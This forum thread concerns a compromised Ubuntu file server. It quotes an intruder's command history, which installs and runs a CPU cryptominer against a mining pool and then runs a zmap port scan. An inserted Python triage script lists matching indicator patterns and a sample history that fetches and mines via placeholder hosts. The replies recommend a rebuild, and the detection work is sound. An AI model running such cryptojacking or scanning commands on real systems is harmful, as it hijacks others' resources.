Server Compromised?

Discussion in 'Technical' started by dipeshmehta, May 16, 2017.

    I have been running an Ubuntu Server 14.04 LTS, mainly for samba as a file server. The server runs fine unattended, so I do not need to log in to the server for several days. When I logged into the server today, I found some suspicious activity in the command history. While searching the web for the commands used, I came to know it's something about cryptocurrency / bitcoins etc.

    The following is what I found in the command history:

    cd /usr/local/games
    mkdir miner
    cd miner
    sudo apt-get install -y git automake pkg-config build-essential libcurl4-openssl-dev
    git clone
    cd cpuminer-multi
    CFLAGS="-march=native" ./configure
    ./minerd -a cryptonight -o stratum+tcp://
    cat /proc/cpuinfo
    ./configure --disable-aes-ni
    ./minerd -a cryptonight -o stratum+tcp://
    tar xvf pooler-cpuminer-2.4.4-linux-x86_64.tar.gz
    ./minerd -a cryptonight
    apt-get install zmap
    zmap -p 2222

    While checking the logs, I found all log files in /var/log are of 0 size, with a datestamp of November 25.
    As a precaution, I stopped the port forward for port # 22 on my firewall and changed passwords.
    Kindly guide me on what I should do further.
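As an added triage example (not part of the original thread), here is a small Python script that checks shell history lines for the miner and scanner indicators the OP found, and lists zero-byte log files like the ones reported in /var/log. The sample history, the pool URL and the indicator patterns are constructed for this example.

```python
import re
from pathlib import Path

# Indicators modelled on the command history in the post above:
# a CPU miner being built and run, and a port scanner being installed.
# The regexes themselves are an assumption made for this example.
HISTORY_INDICATORS = {
    r"\bminerd\b": "cpuminer binary executed",
    r"\bcpuminer": "cpuminer source/tarball referenced",
    r"cryptonight": "CryptoNight mining algorithm selected",
    r"stratum\+tcp://": "mining pool (stratum) URL",
    r"\bzmap\b": "internet-wide port scanner installed or run",
    r"apt-get install .*\bgit\b": "build toolchain (git) installed",
}

def flag_history(lines):
    """Return (line, reason) pairs for history lines matching an indicator."""
    hits = []
    for line in lines:
        stripped = line.strip()
        if not stripped:
            continue
        for pattern, reason in HISTORY_INDICATORS.items():
            if re.search(pattern, stripped):
                hits.append((stripped, reason))
                break  # one reason per line is enough for triage
    return hits

def walk_sizes(log_dir):
    """Yield (relative path, size in bytes) for every regular file under log_dir."""
    root = Path(log_dir)
    for p in root.rglob("*"):
        if p.is_file():
            yield str(p.relative_to(root)), p.stat().st_size

def empty_logs(entries):
    """Names of zero-byte files; a /var/log full of these suggests the logs were wiped."""
    return sorted(name for name, size in entries if size == 0)

# Constructed sample history; the repository and pool hosts are placeholders.
SAMPLE_HISTORY = """\
cd /usr/local/games
mkdir miner
sudo apt-get install -y git automake pkg-config build-essential
git clone https://example.invalid/cpuminer-multi
CFLAGS="-march=native" ./configure
./minerd -a cryptonight -o stratum+tcp://pool.example.invalid:3333
cat /proc/cpuinfo
apt-get install zmap
zmap -p 2222
ls -la
""".splitlines()

if __name__ == "__main__":
    for line, reason in flag_history(SAMPLE_HISTORY):
        print(f"[!] {reason}: {line}")
    print("zero-byte logs:", empty_logs(walk_sizes("/var/log")))
```

Where possible, run this against a disk image or read-only mount rather than on the live host, since on a compromised machine the history file and the system binaries themselves may already have been altered.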
    If you suspect the server has been compromised, the only thing you can do is set it up anew. You can't trust it anymore until then.

    Restore to an older image made before this intrusion happened.
    Then, change the ssh login method to key-only. :cool:

    If one has an image... but then, that older image might have the same security issue... I still recommend setting everything up again.
    Last edited: May 20, 2017

